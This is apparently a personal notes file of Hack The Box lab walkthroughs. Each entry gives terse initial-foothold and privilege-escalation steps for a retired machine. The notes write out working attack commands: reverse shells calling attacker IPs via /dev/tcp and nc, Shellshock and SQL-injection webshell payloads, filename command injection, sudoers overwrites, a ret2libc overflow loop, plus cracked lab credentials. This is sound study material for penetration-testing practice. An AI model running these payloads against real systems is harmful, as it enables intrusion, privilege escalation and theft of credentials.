My Notes

Initial_Foothold
gobuster dir find /admin-dir/credentials.txt which have ftp cred ftpuser:%n?4Wz}R$tTF7
ftp files inspection found web root hidden files, start mysql server on kali
mysql local cli> GRANT ALL PRIVILEGES ON *.* TO root@10.10.10.187 IDENTIFIED by '0xdf' WITH GRANT OPTION;
mysql local cli> CREATE DATABASE pwn; use pwn;
mysql local cli> CREATE TABLE exfil (data VARCHAR(256));
use target /utility-scripts/adminer.php login to our mysql server and input the following command
LOAD DATA LOCAL INFILE '/var/www/html/index.php'; INTO TABLE pwn.exfil; FIELDS TERMINATED BY "\n"
SELECT * from pwn.exfil; found a valid ssh cred waldo:&<h5b~yK3F#{PaPB&dA}{H>
Privilege_escalation
sudo script admin_tasks.sh has backup.py which has `from shutil import make_archive`
forge python module shutil.py with function make_archive fill with payload
run sudo script with PYTHONPATH=current dir

Initial_Foothold
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Privilege_escalation
web_conf_file found db_cred drupaluser:CQHEy@9M*m23gBVj
enum db found user_hash crack got ssh cred brucetherealadmin:booboo
sudo /usr/bin/snap install

Initial_Foothold
wpscan -e ap --plugins-detection aggressive --url http://backdoor.htb --api-token $WPSCAN_API
WordPress Plugin eBook Download 1.1 - Directory Traversal enum all processes
GNU gdbserver 9.2 - Remote Command Execution (RCE)
Privilege_escalation
inspect_processes
something running screen with root timely
screen -ls root/
discover a session and attach
screen -x root/37344

Initial_Foothold
gobuster dir
/dev/phpbash.php www-data webshell
Privilege_escalation
www-data can sudo as scriptmanager without password
echo payload to cron script get root shell

Method 1
Elastix 2.2.0 - 'graph.php' Local File Inclusion
LFI /etc/amportal.conf leak creds
ssh root password reuse
Method 2
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution, need more adjust due to old protocols
sudo nmap --interactive
Method 3
password reuse login to webmin as root
Method 4
10000/tcp ShellShock {Any time there’s CGI (especially on an old machine)}
test for browser respond time: User-Agent: () { :; };sleep 10
test ping with tcpdump: User-Agent: () { :; };ping -c 1 10.10.14.2
payload: User-Agent: () { :; };BASH_PAYLOAD
Method 4
Failed: Log Poisoning(put payload in User-Agent and trigger it with LFI access_log) can not read the file
Success: LFI trigger /var/mail/[username]
Using swaks --to asterisk@localhost --from kali@kali.htb --header "Subject: test shell" --body 'check out this code: PHP_ONE_LINER_PAYLOAD' --server TARGET_IP
Using telnet 25/tcp manually send mail

Initial_Foothold
gobuster dir discover gitlab bookmark
add link to bookmark (unmask autofilled password) OR decript the bookmark js code to get cred
login and enum gitlab discover auto deployer
In /profile repo, inject payload into index.php and commit to a new branch(we can't commit to master branch)
merge that new branch into master branch and trigger payload on /profile/index.php to get www-data shell
Privilege_escalation 1
discover multipule containers and nmap scan discover a postgresql server running on local
setup chisel tunnel, psql -h 127.0.0.1 -p 5432 -U profiles, get clave cred
ssh as clave analize RemoteConnection.exe in user home dir got root password and ssh as root
Privilege_escalation 2
www-data (root) NOPASSWD: /usr/bin/git pull
cp profile repo into /dev/shm due to www-data can't write the profile/.git/hooks
rename payload file as .git/hooks/post-merge
update the master branch (on webpage, edit index.php and commit to new branch=>merge to master)
sudo /usr/bin/git pull

Method 1
gobuster dir
/plugins download BlockCore.jar
apt install jd-gui, found password 8YsqfCTnvxAUeduzjNSXe22 and wpscan found username notch and ssh
sudo ALL
Method 2
login ftp using notch:8YsqfCTnvxAUeduzjNSXe22 upload perm 600 id_rsa and cp it as Authorized_keys, then ssh
CVE-2017-6074 also works but crash a lot

Initial_Foothold
gobuster dir found username fergus and clues in /todo.txt
bruteforce /admin/login with customized script and cewl webpage wordlist found fergus:RolandDeschain
MSF[Bludit Directory Traversal Image File Upload Vulnerability] get www-data shell
Privilege_escalation
found hugo password hash in /bl-content/databases/users.php
crackstation hugo:Password120
ssh (ALL, !root) /bin/bash
Sudo version 1.8.25p1 (before 1.8.28)
CVE-2019-14287[sudo -u#[uid]] but `sudo -u#0 bash` not work, `sudo -u#-1 bash` works

Initial_Foothold
register username input SQL Truncation[add space end with non-space till max-length(20) of sql username field breached, ended non-space got trimmed space auto removed, end up register(overwrite) admin account success]
discover the collection which guests submitted is located in admin's collection tab as PDF file
XXS[Cross Site Scripting] Using guest account submit a js read file script block(not by file) to the collection, and download the PDF in admin's collection to verify the output.
/etc/passwd read users and user reader's ssh private key in PDF
Privilege_escalation 1
linpeas.sh found CVE-2021-4034
https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c
Privilege_escalation 2
pspy found a root cron job called logrotate
logrotten https://github.com/whotwagner/logrotten

Initial_Foothold
wpscan find [WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation] which we can login without knowing password
Failed: edit theme(php file not writable)
Failed: upload plugin payload(dir not writable)
found cred: orestis:kHGuERB29DNiNE in SMTP settings
login Evolution(email app) found orestis:kIEnnfEKJ#9UmdO
login sup3rs3cr3t.brainfuck.htb found conversation about ssh keys in a encrypted thread
decrypted with vigenere method got a url to download ssh key
ssh2john decrypted orestis:3poulakia!
only_read_root.txt
decrypt files(debug.txt,encrypt.sage) in orestis's home
Privilege_escalation
orestis has group id of 110(lxd)
google hacktricks lxd/lxc Group to root
Failed: ssh root from container to localhost(sshd_config:PermitRootLogin no)
Success:echo "orestis ALL=(ALL) NOPASSWD: ALL" >> /container_base/etc/sudoers

Initial_Foothold
gobuster find /actuator/sessions with JESSIONIDs
replace cookie with a valid JESSIONID got login
command injection in 'username' of auto patching page, payload need base64 encode and replace space with ${IFS%??} OR $IFS
Privilege_escalation
download cloudhosting-0.0.1.jar and open with jd-gui find cred postgres:Vg&nvzAQ7XxR
psql login on target find password hashes and crack with john
ssh josh:manchesterunited and sudo ssh

Initial_Foothold
gobuster vhost found admin.cronos.htb
SQL Injection bypass login(' or 1=1-- -)
ping page intercept with burp and command injection get www-data shell
Privilege_escalation
linpeas.sh found cron job running a writable file(/var/www/laravel/artisan)
inject php payload got root shell

Initial_Foothold
submit a tick in helpdesk.delivery.htb and use its tick_id@delivery.htb to receive confirmation email when doing register on delivery.htb TCP/8065
login and enter 'Internal' channel found maildeliverer:Youve_G0t_Mail!
Privilege_escalation 1
Found MariaDB cred mmuser:Crack_The_MM_Admin_PW in /opt/mattermost/config/config.json
found root password hash in MariaDB/mattermost/Users and crack with hashcat root:PleaseSubscribe!
su root
Privilege_escalation 2
Based on msg history of 'Internal' channel, all passwords are related to 'PleaseSubscribe!' =>
echo 'PleaseSubscribe!' > suspectpass.txt
hashcat --stdout ./suspectpass.txt -r /usr/share/hashcat/rules/best64.rule > passwords.txt
./sucrack -a -w 20 -s 10 -u root ./passwords.txt

Initial_Foothold
gobuster dir find /upload 'XML elements:Author,Subject,Content' indicate XXE
XXE injection[XML(eXtensible Markup Language) External Entity Injection] fetch roosa ssh key
Privilege_escalation
found git repo in roosa home
`git log` show all history commit and found 'key'
`git show diff COMMIT_ID` got some ssh keys
ssh root with key

Initial_Foothold 1
tcp/80 register then found /archive in source code comment
SSTI(Server Side Templet Injection) using payloadallthethings(Exploit the SSTI by calling Popen without guessing the offset)
Initial_Foothold 2
tco/80 command injection by creating new post with content of a http://KALI_IP/$(cmd)
setup listener on kali, use $IFS to replace space and overwrite ssh key to get stable shell
Privilege_escalation
linpeas.sh found shaun:Guitar123
login tcp:8089 splunk as shaun got more functions
https://github.com/cnotin/SplunkWhisperer2
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.6 --username shaun --password Guitar123 --payload "bash -c 'bash -i >& /dev/tcp/10.10.14.6/443 0>&1'"

Initial_Foothold
webpage found dynadns:sndanyd and gobuster dir found /nic
command injection by curl /nic/update `curl -G --data-urlencode 'hostname=$(cmd).no-ip.htb' 'http://dynadns:sndanyd@10.10.10.244/nic/update'`
need to escap '.' by turning ip into a long dec
Privilege_escalation
find ssh private key in file
nsupdate with a local key in order to match the ssh key 'from' requirement
ssh as bindmgr, inspect sudo script and find vuln code in 'cp *'
setup SUID 'bash' file
create files: '.version'(to satisfy the script condition)
create files: '--preserve=mode'(to preserve the mode of the SUID 'bash' )
run sudo script, newly copied '/etc/bind/named.bindmgr/bash' is own by root and has SUID preserved.
bash -p

Initial_Foothold
gobuster dir found /cyberlaw.txt with hints
admin login bypass(github php hash collision md5)(php type juggling)(sqlmap dumped admin password hash is a 0e.. hash) got img upload
file name truncation (AA..A.php.gif) reach length to trim the .gif
Privilege_escalation
found moshe:falafelIsReallyTasty in connection.php and su moshe
`w` found user yossi is logged in
`cat /dev/fb0 > screenshot.raw`(frame buffer) and `cat /sys/class/graphics/fb0/virtual_size`(1176,885)
open with gimp(img viewer) and set resolution to 1176,885 found yossi:MoshePlzStopHackingMe!
yossi has disk gid
`debugfs /dev/sda1` to get root.txt and root's ssh key

Initial_Foothold
webpage got img upload
Failed:cmd.php file error which is only display not executed
uploaded url can customized means SSRF(Server Side Request Forgery),
gobuster vhost found admin.forge.htb(need to bypass block using admin.Forge.htb OR hosting redirect),
hosting redirect to admin.Forge.htb found /announcements
hosting redirect to admin.Forge.htb/announcements found ftp cred user:heightofsecurity123!
hosting ftp://user:heightofsecurity123!@127.0.0.1 got error
hosting http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/ show the user.txt which means the working dir is user home
hosting http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/id_rsa
ssh as user
Privilege_escalation
inspect sudo script, run it and `bg` and `nc` interact with it, input secretadminpassword
input non int to cause Exception which call pdb(python debugger)
import os; os.system('bash')

Initial_Foothold
zone transfer got multiple subdomains, ftp /general got creds.txt admin:WORKWORKHhallelujah@# which works in administrator1.friendzone.red
LFI(Local File Include) in 'pagename' and `nmap --script smb-enum-shares.nse -p445 10.10.10.123` shows writable /etc/Development
`smbclient -N //10.10.10.123/Development -c 'put cmd.php' `
pagename=php://filter/convert.base64-encode/resource=dashboard shows the 'pagename' will be apend with '.php'
use LFI trigger(need to replace & with %26) `https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/cmd&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.7 443 >/tmp/f`
Privilege_escalation
found friend:Agpyu12!0.213$ in mysql_data.conf
su friend, pspy found /opt/server_admin/reporter.py run by root timely
inspect the script, `import os` which is /usr/lib/python2.7/os.py worldwritable
inject python payload get root

Initial_Foothold
gobuster dir find http://frolic.htb:9999/admin "c'mon i m hackable"
http://frolic.htb:9999/admin/success.html decrypted by Ook! method
curl http://frolic.htb:9999/asdiSIAJJ0QWE9JAS/ got a long string
analized by https://www.dcode.fr/cipher-identifier got a zip file
zip2john crack got 'password' and unzip got index.php which is another very long string
analized by https://www.dcode.fr/cipher-identifier identify mostly to ASCII Converter got a long base64 string
base64 decode got a long string made of ]>+.< analized again identify as Brainfuck, decrypt got 'idkwhatispass'
admin:idkwhatispass works on /playsms
searchsploit playsms got many, this one works [PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php]
create payload.csv and intercept with burp and replace user-agent with real payload got www-data shell
Privilege_escalation
found SUID [-rwsr-xr-x 1 root root 7480 Sep 25 2018 /home/ayush/.binary/rop]
cat /proc/sys/kernel/randomize_va_space = '0' confirm ASLR(Address space layout randomization) is off and copy to kali
msf-pattern_offset find offset is 52
`ldd /home/ayush/.binary/rop` found /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
`readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system` note system 0003ada0
`readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit` note exit 0002e9d0
`strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh` note /bin/sh 15ba0b
transfer exploit.py to target and `/home/ayush/.binary/rop $(python ./exploit.py)` got root

Initial_Foothold
gobuster dir found /exposed.php and it can make server site request
start tcpdump and fill in webpage with `http://10.10.14.15/test.php; ping -c 1 10.10.14.15;` got ping back
upload payload `http://10.10.14.15/cmd.php -o uploads/cmd.php`
curl -G http://10.10.10.24/uploads/cmd.php --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.15/443 0>&1'" got www-data shell
Privilege_escalation
GNU Screen 4.5.0 - Local Privilege Escalation https://www.exploit-db.com/exploits/41154

Initial_Foothold
gobuster vhost found api-prod.horizontall.htb, gobuster dir found http://api-prod.horizontall.htb/admin
`curl http://api-prod.horizontall.htb/admin/strapiVersion` {"strapiVersion":"3.0.0-beta.17.4"}
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) https://www.exploit-db.com/exploits/50239
Privilege_escalation
found something running on target local tcp/8000, setup ssh portforward
Laravel 8.4.2 debug mode - Remote code execution https://www.exploit-db.com/exploits/49424

Initial_Foothold
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) https://www.exploit-db.com/exploits/16922 inspect got the gist
`nc 10.10.10.117 6697` and `AB; whoami`
Or use https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor
Privilege_escalation
got hint and pass from /home/djmardov/Documents/.backup
Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss # steg is short for steganography
`wget 10.10.10.117/irked.jpg; steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss` output a file called pass.txt djmardov:Kab6h+m+bbp2J:HG (the second ': is part of the pass)
strange SUID file: -rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
`echo '/bin/bash' > /tmp/listusers; chmod +x /tmp/listusers; /tmp/listusers` got root

Initial_Foothold 1
SQL injection /room.php?cod=-1+union+select+1,2,3,4,"<%fphp+echo+shell_exec($_GET['cmd'])%3b%3f>",6,7+into+outfile+'/var/www/html/pwned.php'
`curl "http://10.10.10.143/pwned.php?cmd=id"`
Initial_Foothold 2
SQL injection using group_concat(), which will put all the values from different rows into one string
enum db found DBadmin:2d2b7a5e4e637b8fba1d17f40318f277d29964d0 decrypt(MYSQL5) imissyou
login /phpmyadmin/index.php and inject payload there
Privilege_escalation
www-data `sudo -l` (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
inspect sudo script, create payload.sh and run sudo script -p then input $(./payload.sh) because the blacklist don't have '$'
found SUID file -rwsr-x--- 1 root pepper 174520 Feb 17 03:22 /bin/systemctl
https://gtfobins.github.io/gtfobins/systemctl/

Initial_Foothold
weblogin with root:password
enum users found lnorgaard:Welcome2023! ssh login
Privilege_escalation
found RT30000.zip in home,unzip got KeePassDumpFull.dmp and passcodes.kdbx
install keepass https://keepass.info/download.html
https://github.com/matro7sh/keepass-dump-masterkey use to guess masterkey
google '●Mdgr●d med fl●de' found 'Danish Red Berry Pudding (Rødgrød Med Fløde)' and 'rødgrød med fløde' works
`apt install putty-tools -y` `puttygen putty_rootkey -O private-openssh -o root_rsa`
ssh -i root_rsa root@10.10.11.227

Initial_Foothold
curl webpage found X-Powered-By: PHP/8.1.0-dev
google found https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
'This line executes PHP code from within the useragent HTTP header, if the string starts with 'zerodium''
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution https://www.exploit-db.com/exploits/49933
Privilege_escalation
james$ (root) NOPASSWD: /usr/bin/Knife
https://gtfobins.github.io/gtfobins/knife/
`sudo /usr/bin/knife exec -E 'exec "/bin/sh"'`

Method 1
vsftpd 2.3.4 lead to
Failed: using smbclient directly
root@kali# smbclient //10.10.10.3/tmp -U './=`nohup nc -e /bin/sh 10.10.14.24 443`'
Enter =`NOHUP NC -E \bin/sh 10.10.14.24 443`'s password:
For some reason, the start of the command is getting capitalized, which is going to break execution.
Success: switch user within smbclient cli
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.14.24 443`" got root shell
Method 2
github CVE-2007-2447 - Samba usermap script.
https://github.com/amriunix/CVE-2007-2447 got root shell

Initial_Foothold
tcp/9001 'the site say "default"' google 'supervisord default password' get user:123 and works
tcp/80 401 response has '127.0.0.1:3000' and 'WWW-Authenticate: Basic realm="."' which means the type of auth required is HTTP basic, and it's also serving in localhost:3000
nmap found http-robots.txt has /weather, gobuster dir /weather found /weather/forecast
enum /weather/forecast found conde injection
curl -s "http://10.10.10.218/weather/forecast?city=')+os.execute('id')+--"
curl -G --data-urlencode "city=') os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 443 >/tmp/f') --" 'http://10.10.10.218/weather/forecast' -s
Privilege_escalation
cat .htpasswd got hash, decrypted got webapi_user:iamthebest
/etc/passwd found username r.michaels
`curl -s http://127.0.0.1:3001/~r.michaels/id_rsa -u webapi_user:iamthebest` got the ssh key
Failed: `sudo` on BSD is `doas`
`netpgp --decrypt --output=devel_backup-2020-09-16.tar.gz /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc`
`tar xvzf devel_backup-2020-09-16.tar.gz` and `cat devel-2020-09-16/www/.htpasswd` got webapi_user hash but diff with the .htpasswd one
crack got 'littlebear', `doas sh` enter pass and got root

Initial_Foothold
SQL injection (' or 1=1-- -) bypass /login.php then found img upload.php
add img magic bytes(‰PNG␍␊␚␊) at the top of cmd.php.png https://en.wikipedia.org/wiki/List_of_file_signatures
gobuster dir found /images/uploads/ upload and trigger with curl
Privilege_escalation
/var/www/Magic/db.php5 found db cred theseus:iamkingtheseus
`mysqldump --user=theseus --password=iamkingtheseus --host=localhost Magic` found admin:Th3s3usW4sK1ng
Th3s3usW4sK1ng works when `su theseus`
-rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo
`strings /bin/sysinfo` found it's running 'cat' 'lshw' 'fdisk' 'free'
`echo 'chmod 777 /etc/sudoers' > /dev/shm/cat; chmod +x /dev/shm/cat; export PATH=/dev/shm:$PATH`
`which cat` verify '/dev/shm/cat' and trigger `/bin/sysinfo`
`ls /etc/sudoers` verify it's '777' and `echo 'theseus ALL=NOPASSWD: ALL' >> /etc/sudoers`
`su sudoers` got root

Initial_Foothold
TCP/443 cert found staging-order.mango.htb
NoSQL Inejction Login Bypass
burp edit: username[$ne]=0xdf&password[$ne]=0xdf&login=login
found cred(admin:t9KcS3>!0B#2 and mango:h3mXK8RhU~f{]f5H) using scripts from 0xdf for ippsec
ssh as mango then su admin
Privilege_escalation
-rwsr-sr-- 1 root admin 10352 Jul 18 2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
https://gtfobins.github.io/gtfobins/jjs/
`/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs`
echo 'var FileWriter = Java.type("java.io.FileWriter"); var fw=new FileWriter("/etc/sudoers"); fw.write("admin ALL=NOPASSWD: ALL"); fw.close();' | /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

Initial_Foothold
gobuster vhost found dev01.artcorp.htb and its mainpage has /metaview/
enum /metaview/ discover it's running exiftool, google exiftool cve
CVE-2021-22204 https://github.com/UNICORDev/exploit-CVE-2021-22204
OR manually generate payload by https://github.com/OneSecCyber/JPEG_RCE
Privilege_escalation
pspy found UID1000(thomas) running convert_images.sh which run /usr/local/bin/mogrify
`mogrify --version` found 'Version: ImageMagick 7.0.10-36' google found its exploit
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
create payload as /var/www/dev01.artcorp.htb/convert_images/rce.svg and wait for thomas shell
thomas `sudo -l` env_keep+=XDG_CONFIG_HOME (root) NOPASSWD: /usr/bin/neofetch \"\"
`cat /usr/bin/neofetch | grep XDG_CONFIG_HOME=` XDG_CONFIG_HOME="${XDG_CONFIG_HOME:-${HOME}/.config}"
`echo $HOME` /home/thomas which means we can overwrite the config.conf
https://gtfobins.github.io/gtfobins/neofetch/
`echo '/bin/sh' > /home/thomas/config.conf ; sudo neofetch \"\" `

Initial_Foothold
gobuster dir found /admin which is 'pi-hole'
Forensic 'Mirai Botnet' OR google 'pi-hole default cred' found pi:raspberry which works on ssh
Privilege_escalation
pi `sudo -l` (ALL : ALL) ALL (ALL) NOPASSWD: ALL
`sudo su -` the root.txt is a hint not flag
hint says it was in USB stick
`lsblk` found 'sdb 8:16 0 10M 0 disk /media/usbstick'
Recover_root.txt 1
`grep -aPo '[a-fA-F0-9]{32}' /dev/sdb`
Recover_root.txt 2
`strings /dev/sdb -n 32`
Recover_root.txt 3
copy the entire /dev/sdb to kali, then use file recovery tools like extundelete testdisk
`dcfldd if=/dev/sdb of=/home/pi/usb.dd` `scp pi@10.10.10.48:/home/pi/usb.dd .`

Initial_Foothold
gobuster dir found /backup/backup.tar which contain source code of webroot files
insert php oneliner payload into middle of payload.php.png and upload
curl /uploads/payload.php.png?cmd=payload got apache shell
Privilege_escalation
analize crontab.guly found check_attack.php run every 3 mins
analize check_attack.php found it loop the files in /var/www/html/uploads/
if ($value == 'index.html') {
based on this part of the code above, we can infer $value is the full file name
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
based on this part of the code above, we can use file name to inject code
touch '/var/www/html/uploads/a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b'
got guly shell `sudo -l` (root) NOPASSWD: /usr/local/sbin/changename.sh
According to 0xdf: Anything after a space in a value in a network script where the format is VARIABLE=value will be executed. The response to that disclosure was that anyone who can write that file is basically root anyway, so it doesn’t matter.
run the script and input `a /bin/bash` in anyone of the prompt got root

Initial_Foothold
mainpage source code got hint /nibbleblog/
google nibbleblog default cred admin:nibbles works
image.php upload got nibbler shell
Privilege_escalation
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
-rwxrwxrwx 1 nibbler nibbler 80 Jun 24 07:27 monitor.sh
echo payload to it, then run it got root

Initial_Foothold 1
`hydra -l admin -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64`
admin:password123 logged in, create a php oneliner ninevehNotes.txt and rename it with payload.php which shows it's path /var/tmp/ninevehNotes.txt.php
gobuster dir found /department need login
PHP type juggling: username=admin&password[]= which works
trigger with burp http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.php POST &cmd=id Initial_Foothold 2
/info.php shown 'file_uploads ON'
POST payload file to info.php and trigger it
I never try this, only saw it in 0xdf's post
Privilege_escalation(www-data->root)
pspy found root cronjob `/bin/sh /usr/bin/chkrootkit`
Chkrootkit 0.49 - Local Privilege Escalation https://www.exploit-db.com/exploits/33899
just put a excutable payload as /tmp/update
Privilege_escalation(www-data->amrois->root)
steganography file /var/www/ssl/secure_notes/nineveh.png
`binwalk -e nineveh.png` will get a few files include ssh key pair
got username in public key, can try it with private key, but not work
simpler way is ssh within the target machine with the key
OR do port knocking(why direct ssh fail)
`ps auxww` show there is 'knockd' running and /etc/knockd.conf has the sequence
`for i in 571 290 911; do nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 >/dev/null done; ssh -i id_rsa_nineveh_amrois amrois@10.10.10.43`

Initial_Foothold
tcp/3000 check source code, found /api/admin/backup and /api/session in admin.js
found username and password hashes in /api/users
login with myP14ceAdm1nAcc0uNT:manchester and download myplace.backup
`cat myplace.backup | base64 -d > myplace.backup.decode; file myplace.backup.decode` 'Zip archive data'
`fcrackzip -D -p rockyou.txt myplace.backup.zip` OR zip2john then john crack, password=magicword
unzip, found cred mark:5AYRft73VtFpc84k in app.js of the zip, it works for ssh
Privilege_escalation
`ps auxww` found tom running '/usr/bin/node /var/scheduler/app.js' inspect the app.js
`mongo -u mark -p 5AYRft73VtFpc84k scheduler`
`db.tasks.insert({"cmd": "bash -c 'bash -i >& /dev/tcp/10.10.14.19/443 0>&1'"})`
tom is in 'admin' group `find / -group admin -ls 2>/dev/null `
which output only one file /usr/local/bin/backup the file has SUID of root
according to /var/www/myplace/app.js the backup file is calling -q arg
it can go Buffer Overflow(ippsec video, bruteforce the ASLR(Address space layout randomization))
normal pattern_create will have badchars, other detail similar to Frolic
`msf-pattern_create -l 1000 -s ABCDEFGHIJKLMNOPQRSTUVWXYZ,abcdefghijklmnopqrstuvwxyz,0123456789`
OR just command injection(0xdf post):
backup -q "" '
> /bin/bash'

Initial_Foothold
HTB pdf show it took 6 hours to finish the gobuster dir
gobuster dir found /backend which redirect to /backend/backend/auth/signin
login success with admin:admin
October CMS 1.0.412 - Multiple Vulnerabilities https://www.exploit-db.com/exploits/41936
it says .php5 is not in upload blacklist
upload php oneliner as payload.php5, and click 'public URL' to trigger
Privilege_escalation
linpeas.sh found -rwsr-xr-x 1 root root 7377 Apr 21 2017 /usr/local/bin/ovrflw
`cat /proc/sys/kernel/randomize_va_space` output '2' means ASLR(Address space layout randomization) is ON
ASLR can also be verified by `ldd /usr/local/bin/ovrflw | grep libc` multiple times to see if the address changes
address changes very from 0xb7500000 to 0xb76ff000 which means brute force ASLR need to loop a few hundred times
0xdf: `while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x83\x63\xb7" + "\x60\xb2\x62\xb7" + "\xac\xab\x75\xb7"'); done`
ippsec: https://youtube.com/watch?v=K05mJazHhF4&t=885

Initial_Foothold
gobuster dir found /music and click 'login' redirect to /ona
app version on page is 18.1.1 click 'download' show the app name 'OpenNetAdmin'
OpenNetAdmin 18.1.1 - Remote Code Execution https://www.exploit-db.com/exploits/47691
`./47691.sh http://10.10.10.171/ona/` got www-data shell
Privilege_escalation
linpeas.sh found cred ona_sys:n1nj4W4rri0R! from /var/www/html/ona/local/config/database_settings.inc.php
password resue jimmy:n1nj4W4rri0R!
linpeas.sh found internal webserver from /etc/apache2/sites-enabled/internal.conf
`ls -al /var/www/internal/` `curl 127.0.0.1:52846/main.php` got encrypted RSA private key
ssh2john decrypted pass 'bloodninjas' and ssh as joanna
joanna `sudo -l` (ALL) NOPASSWD: /bin/nano /opt/priv
after enter 'nano', Ctrl+x is “Execute Command”, If enter /bin/sh, it freeze, because the stdin/stdout/stderr are messed up
`reset; /bin/sh 1>&0 2>&0` will fix

Initial_Foothold
based on the content of webpage and source code, google 'Java YAML deserialization'
https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858
https://github.com/artsploit/yaml-payload
https://0xdf.gitlab.io/2021/07/03/htb-ophiuchi.html
I did not successfully replicate the process to get the tomcat shell
Privilege_escalation
found cred admin:whythereisalimit in /opt/tomcat/conf/tomcat-users.xml
admin `sudo -l` (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go
after inspect 'index.go', we need to create a 'main.wasm' that can output '1' and 'deploy.sh' as payload
install the tool-kit https://github.com/WebAssembly/wabt and `apt install cmake`
`wasm2wat` convert main.wasm into WebAssembly text format from the binary format
To see the code more clearly use `wasm-decompile main.wasm` discover it returns '0' anyway
https://wasdk.github.io/WasmFiddle/ turn C_code into wasm and download
C_code: int info() {return 1; }
'deploy.sh' can be write our public key in /root/.ssh/(0xdf way) OR add sudoer OR add root user

Initial_Foothold
nmap discover UDP/161 SNMP
`snmpbulkwalk -c public -v2c 10.10.11.136 > snmpbulkwalk_v2c.txt`
`cat snmpbulkwalk_v2c.txt | grep '\-u'` found cred daniel:HotelBabylon23 which works on ssh
Privilege_escalation
/etc/apache2/sites-enabled/pandora.conf found subdomain pandora.panda.htb running on localhost:80
port forwarding '-L 9001:localhost:80' and found 'v7.0NG.742_FIX_PERL2020' in webpage
https://www.sonarsource.com/blog/pandora-fms-742-critical-code-vulnerabilities-explained/
SQL injection (CVE-2021-32099) phar deserialization (CVE-2021-32098) remote file inclusion (CVE-202132100) cross-site request forgery (no CVE)
SQLi: `sqlmap -u 'http://localhost:9001/pandora_console/include/chart_generator.php?session_id=1' --time-sec=10 --batch -D pandora -T tsessions_php --dump`
find the cookie stands out: 'g4e01qdgk36mfdh90hvcc54umq' which works when replace it in browser
OR `wfuzz -u http://localhost:9001/pandora_console/ -b PHPSESSID=FUZZ -w sessions`
webpage login as matt CVE-2020-13851 Artica Pandora FMS 7.44 allows remote command execution via the events feature
https://github.com/hadrian3689/pandorafms_7.44
Also there is way to upload webshell: “Admin tools” > “File Manager”
after get matt shell -rwsr-x--- 1 root matt 16816 Dec 3 15:58 /usr/bin/pandora_backup
the SUID don't work unless write matt's ssh key and get a proper ssh session
`ltrace pandora_backup` found it’s using 'system' to call 'tar' without a full path
`export PATH=/dev/shm:$PATH` and create a payload file as /dev/shm/tar then run `/usr/bin/pandora_backup`

Initial_Foothold
extra header on tcp/80 'X-Backend-Server: office.paper'
source code shows: worldpress 5.2.3
gobuster vhost found chat.office.paper which is a rocket.chat app with hint:'Registration can only be done using the secret registration URL!'
`wpscan --url http://office.paper --api-token $WPSCAN_API`
WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts https://www.exploit-db.com/exploits/47690
'http://office.paper/?static=1' shows secret registration URL 'http://chat.office.paper/register/8qozr226AhkCHZdyY'
register and login discover a chat bot,'recyclops help', it can read dir/files
'file ../../../etc/passwd' shows username dwight, 'file ../hubot/.env' shows cred recyclops:Queenofblad3s!23
ssh success with dwight:Queenofblad3s!23
Privilege_escalation
linpeas.sh found CVE-2021-3560 Polkit v0.105-26 Linux Privilege Escalation PoC by SecNigma
https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
`./poc.sh -u=username -p=password` `su username`

Initial_Foothold
main page hint:'implemented Fail2Ban' which means no bruteforce(hydra/gobuster)
source code leak 'http://10.10.10.206/CuteNews/rss.php'
'http://10.10.10.206/CuteNews/' is a login page CuteNews 2.1.2
CuteNews 2.1.2 - Remote Code Execution https://www.exploit-db.com/exploits/48800
OR manually upload avatar in 'index.php?mod=main&opt=personal' and bypass local js file filter
`exiftool -Comment='' avatar.png `
